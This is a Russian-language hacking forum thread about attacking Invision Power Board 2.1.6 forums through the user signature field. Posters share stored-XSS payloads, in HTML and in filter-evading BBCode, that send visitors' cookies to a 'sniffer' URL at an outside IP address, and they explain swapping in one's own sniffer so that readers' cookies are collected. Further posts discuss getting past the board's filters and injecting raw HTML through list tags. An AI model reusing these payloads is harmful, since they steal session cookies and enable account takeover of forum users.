Форумы Уязвимости invision board версии 2.1.6?

фильтрует текст, слабо заменить?впринцыпе должно прокатить.

 

а если на форуме выключена поддержка загрузки аватар из нета? только с локальной ашины=(
Пробовал в подпись тоже не жрет

 

Да просто заплатку сделали уже)))

 

Народ пробуйте вставить в подпись:

<span style='color:#EEF2F7'><span style='color:<img src='http://aaa.aa/=`aaa.jpg' border='0' alt='user posted image' />'>` style=background:url(javascript:document.images[1].src="http://10.12.1.24/snifer/s.gif?"+document.cookie) </span></span>

или вот:
[CO*LOR=[IM*G]http://aaa.aa/=`aaa.jpg[/IM*G]]` style=background:url(javascript:document.images[1].src="http://10.12.1.24/snifer/s.gif?"+document.cookie [/COL*OR] без *


у меня работает =)

 

дай код поточнее т.к. то что ты дал не работает лично у меня на 2.1.6

 

хм.. тоже непонял.... зачем например в коде есть `?

 

Ребят попробуйте в подписи вставить список.

[_list = 1]

<table border="1"><tr><td width="100" height="50"></td></tr></table>
<короче тут можно написать свою станичку>

[_/list]

(без земли)

но </script> и javascript: он сечет

гы. до эксперементировал! у меня терь кнопка "Обноить подпись" не срабатывает

 

ссылка битая! скажите где скачать мона! оч надо!

 

НЕ слабо, заменил, а толку... Тоже самое пишет

 

это его так сам форум поуродовал

 

Ну я вставил это в подпись, и что должно произойти???

 

там где _http://10.12.1.24/snifer/s.gif надо писать адрес своего снифера и когда ктото прочтет сообщение его куки придут на снифер =)

ИМХО:
читай розделы: Новичкам и XSS Крупным планом

 

да не работает оно просто на 2.1.6 вот и все (у меня)
обратные кавычки фильтруются
дай точный BB код а не результат или это бред просто